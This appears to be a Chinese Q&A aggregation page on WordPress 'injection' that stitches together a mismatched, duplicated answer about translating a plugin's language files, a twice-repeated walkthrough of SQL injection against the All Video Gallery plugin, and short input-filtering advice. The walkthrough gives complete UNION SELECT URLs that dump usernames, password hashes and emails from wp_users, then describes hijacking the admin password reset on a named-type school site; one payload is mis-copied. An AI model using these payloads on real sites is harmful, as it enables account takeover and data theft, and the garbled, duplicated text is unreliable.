1. wordpress插件有注入怎么办
wordpress插件有注入解决方法: POEDIT2.UltraEdit这里以configure-smtp插件为例来做演示一、普通汉化首先将configure-smtp安装后进入插件设置界面可以看到全是英文,打开wp-content\plugins\configure-smtp目录可以看到目录下有configure-smtp.pot文件,这个就是语言包的英文模板(可移植对象文件)了1.将其复制一份到lang目录下并重命名为configure-smtp-zh_CN.po2.使用POEDIT软件打开(POEDIT的设置就不做讲解了,百度一下你就知道)打开后即可对原文本对照进行逐个翻译了。
翻译完成后保存,这是会自动根据po文件生成同名的mo文件。mo文件就是WP调用的语言包。
3.翻译完成后需要设置加载,打开configure-smtp.php主文件,在其中加入如下代码load_plugin_textdomain('configure-smtp','wp-content/plugins/configure-smtp/lang');/**说明:load_plugin_textdomain('插件名称','wp-content/plugins/configure-smtp/lang 插件语言包所在目录');WordPress插件,是为开源博客程序WordPress添加各种功能的扩展组件。WordPress之所以成为目前使用最广泛的博客程序之一,正因为它拥有非常多的插件。
仅wordpress官网已收录的插件就有一万多个。如果算上没有被WordPress官网收录的插件,说有十万个,一点也不夸张。
有了这数量庞大的WordPress插件,让WordPress程序可以扩展出各种各样的功能。
2. 如何利用SQL注入漏洞攻破一个WordPress网站
SQL注入的基本原理sql注入成因主要是对页面参数没有进行非法字符校验导致,比如说一个订单页面要显示某个客户的所有订单列表,这个页面的地址可能是/list.php?customID=3,我们推理,这样页面的后台处理的sql应该是这样的:select * form custom_order where custom_id = {$_GET['customID']}按正常情况下,这里的接收的参数{$_GET['customID']}的值应该是传入的值3,这样页面就能正确的把所有客户ID等于3的订单信息显示到页面上。
但是,如果这个参数被人恶意改成了如下形式:/list.php?customID=-1 union select 1,2,3,user,5,passwd,7,8,9,10 from admin按这样的参数拼装成的sql就成了这样:select * form custom_order where custom_id = -1 union select 1,2,3,user,5,passwd,7,8,9,10 from admin这样注入恶意sql后,订单列表页显示的就不是订单信息了,而是数据库中用户的名称和密码,或者任意其它想要的信息。下面我们就按照这个原理来一步一步的获取这个公立学校网站的管理员用户名,管理员邮箱地址,通过邮箱重置管理员密码,登录超级管理员后台。
All Video Gallery插件的漏洞简介安装了All Video Gallery插件的Wordpress博客里会有这样的一个地址:/wp-content/plugins/all-video-gallery/config.php?vid=1&pid=11访问这个页面会显示一些配置信息,问题就出在pid这个参数上,程序后台显然没有严格检查这个参数,我们将利用这个参数进行sql注入。WordPress是一个开源的平台,我们很容易弄清楚用户表的表名是wp_users,存放用户名,密码,邮件地址的字段分别是user_login,user_pass,user_email,我们下面将要把用户信息表注入进去。
获取超级管理员用户名为了获取用户表中的用户名,我们注入的sql是这样的:/wp-content/plugins/all-video-gallery/config.php?vid=11&pid=1&pid=-1 union select 1,2,3,4,group_concat(user_login,0x3a,user_pass),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41 from wp_users在浏览器里输入上面的地址,页面上会显示下面的信息:获取超级管理员邮件地址我们可以直接获取用户的密码,但很显然,密码都是加密的,无法使用,我们这里使用另外一种思路,先获取用户的邮件地址,然后使用这个邮件重置用户的密码。要获取邮件地址,我们需要将上面的sql中的字段名改成user_email:/wp-content/plugins/all-video-gallery/config.php?vid=11&pid=1&pid=-1 union select 1,2,3,4,group_concat(user_login,0x3a,user_email),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41 from wp_users在浏览器里输入上面的地址,页面上会显示下面的信息:重置管理员密码WordPress的后台登陆地址是/wp-login.php,这个地址是可以公共访问的,我们进入这个页面后,点击Lost your password?链接,输入上面获取的管理员邮件。
这样做了之后,Wordpress会向这个邮件地址发送一封含有激活码的密码重置地址。我们无法登陆这个邮箱获取这个地址,但我们可以使用上面同样的方法获取这个激活码,自己拼装出密码重置地址。
存放激活码的字段是user_activation_key,我们的sql注入地址改成下面这样:/wp-content/plugins/all-video-gallery/config.php?vid=11&pid=1&pid=-1 union select 1,2,3,4,group_concat(user_login,0x3a,user_email),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41 from wp_users在浏览器里输入上面的地址,页面上会显示下面的信息:有了激活码,我们就可以拼装出装置密码的地址了:/wp-login.php?action=rp&key=resetkey&login=username利用这个地址进入重置密码页面:总结我们的黑客行动到此基本上是大功告成,但事实上我并没有去执行最后一步。本文的目的不是要告诉人们如何进行黑客攻击,而是要提醒大家防范安全漏洞,所谓知己知彼,方能百战不殆,程序员应当对基本的黑客攻击方式有一些了解,针对性的在编程时避免造成类似sql注入的安全漏洞,构筑更健壮的软件。
3. wordpress插件有注入怎么办
wordpress插件有注入解决方法:
1. POEDIT
2. 2.UltraEdit
这里以configure-smtp插件为例来做演示
一、普通汉化
首先将configure-smtp安装后进入插件设置界面可以看到全是英文,打开wp-content\plugins\configure-smtp目录
可以看到目录下有configure-smtp.pot文件,这个就是语言包的英文模板(可移植对象文件)了
1.将其复制一份到lang目录下并重命名为configure-smtp-zh_CN.po
2.使用POEDIT软件打开(POEDIT的设置就不做讲解了,百度一下你就知道)
打开后即可对原文本对照进行逐个翻译了。翻译完成后保存,这是会自动根据po文件生成同名的mo文件。mo文件就是WP调用的语言包。
3.翻译完成后需要设置加载,打开configure-smtp.php主文件,在其中加入如下代码
load_plugin_textdomain('configure-smtp','wp-content/plugins/configure-smtp/lang');
/*
*说明:load_plugin_textdomain('插件名称','wp-content/plugins/configure-smtp/lang 插件语言包所在目录');
WordPress插件,是为开源博客程序WordPress添加各种功能的扩展组件。WordPress之所以成为目前使用最广泛的博客程序之一,正因为它拥有非常多的插件。仅wordpress官网已收录的插件就有一万多个。如果算上没有被WordPress官网收录的插件,说有十万个,一点也不夸张。有了这数量庞大的WordPress插件,让WordPress程序可以扩展出各种各样的功能。
4. 如何利用SQL注入漏洞攻破一个WordPress网站
SQL注入的基本原理 sql注入成因主要是对页面参数没有进行非法字符校验导致,比如说一个订单页面要显示某个客户的所有订单列表,这个页面的地址可能是/list.php?customID=3,我们推理,这样页面的后台处理的sql应该是这样的:select * form custom_order where custom_id = {$_GET['customID']} 按正常情况下,这里的接收的参数{$_GET['customID']}的值应该是传入的值3,这样页面就能正确的把所有客户ID等于3的订单信息显示到页面上。
但是,如果这个参数被人恶意改成了如下形式:/list.php?customID=-1 union select 1,2,3,user,5,passwd,7,8,9,10 from admin 按这样的参数拼装成的sql就成了这样:select * form custom_order where custom_id = -1 union select 1,2,3,user,5,passwd,7,8,9,10 from admin 这样注入恶意sql后,订单列表页显示的就不是订单信息了,而是数据库中用户的名称和密码,或者任意其它想要的信息。下面我们就按照这个原理来一步一步的获取这个公立学校网站的管理员用户名,管理员邮箱地址,通过邮箱重置管理员密码,登录超级管理员后台。
All Video Gallery插件的漏洞简介 安装了All Video Gallery插件的Wordpress博客里会有这样的一个地址:/wp-content/plugins/all-video-gallery/config.php?vid=1&pid=11 访问这个页面会显示一些配置信息,问题就出在pid这个参数上,程序后台显然没有严格检查这个参数,我们将利用这个参数进行sql注入。WordPress是一个开源的平台,我们很容易弄清楚用户表的表名是wp_users,存放用户名,密码,邮件地址的字段分别是user_login,user_pass,user_email,我们下面将要把用户信息表注入进去。
获取超级管理员用户名 为了获取用户表中的用户名,我们注入的sql是这样的:/wp-content/plugins/all-video-gallery/config.php?vid=11&pid=1&pid=-1 union select 1,2,3,4,group_concat(user_login,0x3a,user_pass),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41 from wp_users 在浏览器里输入上面的地址,页面上会显示下面的信息:获取超级管理员邮件地址 我们可以直接获取用户的密码,但很显然,密码都是加密的,无法使用,我们这里使用另外一种思路,先获取用户的邮件地址,然后使用这个邮件重置用户的密码。要获取邮件地址,我们需要将上面的sql中的字段名改成user_email:/wp-content/plugins/all-video-gallery/config.php?vid=11&pid=1&pid=-1 union select 1,2,3,4,group_concat(user_login,0x3a,user_email),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41 from wp_users 在浏览器里输入上面的地址,页面上会显示下面的信息:重置管理员密码 WordPress的后台登陆地址是/wp-login.php,这个地址是可以公共访问的,我们进入这个页面后,点击Lost your password?链接,输入上面获取的管理员邮件。
这样做了之后,Wordpress会向这个邮件地址发送一封含有激活码的密码重置地址。我们无法登陆这个邮箱获取这个地址,但我们可以使用上面同样 的方法获取这个激活码,自己拼装出密码重置地址。
存放激活码的字段是user_activation_key,我们的sql注入地址改成下面这样:/wp-content/plugins/all-video-gallery/config.php?vid=11&pid=1&pid=-1 union select 1,2,3,4,group_concat(user_login,0x3a,user_email),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41 from wp_users 在浏览器里输入上面的地址,页面上会显示下面的信息:有了激活码,我们就可以拼装出装置密码的地址了:/wp-login.php?action=rp&key=resetkey&login=username 利用这个地址进入重置密码页面:总结 我们的黑客行动到此基本上是大功告成,但事实上我并没有去执行最后一步。本文的目的不是要告诉人们如何进行黑客攻击,而是要提醒大家防范安全漏洞,所谓知己知彼,方能百战不殆,程序员应当对基本的黑客攻击方式有一些了解,针对性的在编程时避免造成类似sql注入的安全漏洞,构筑更健壮的软件。
5. 如何利用SQL注入漏洞攻破一个WordPress网站
要防止SQL注入其实不难,你知道原理就可以了。
所有的SQL注入都是从用户的输入开始的。如果你对所有用户输入进行了判定和过滤,就可以防止SQL注入了。用户输入有好几种,我就说说常见的吧。
文本框、地址栏里***.asp?中?号后面的id=1之类的、单选框等等。一般SQL注入都用地址栏里的。。。。如果要说怎么注入我想我就和上面的这位“仁兄”一样的了。
你只要知道解决对吗?
对于所有从上一页传递过来的参数,包括request.form 、request.qurrystring等等进行过滤和修改。如最常的***.asp?id=123 ,我们的ID只是用来对应从select 里的ID,而这ID一般对应的是一个数据项的唯一值,而且是数字型的。这样,我们只需把ID的值进行判定,就可以了。vbs默认的isnumeric是不行的,自己写一个is_numeric更好,对传过来的参数进行判定,OK,搞定。算法上的话,自己想想,很容易了。但是真正要做到完美的话,还有很多要计算的。比如传递过来的参数的长度,类型等等,都要进行判定。还有一种网上常见的判定,就是判定传递参数的那一页(即上一页),如果是正常页面传弟过来就通过,否则反之。也有对' or 等等进行过滤的,自己衡量就可以了。注意一点就是了,不能用上一页的某一个不可见request.form("*")进行判定,因为用户完全可以用模拟的形式“复制”一个和上一页完全一样的页面来递交参数。
转载请注明出处51数据库 » wordpress注入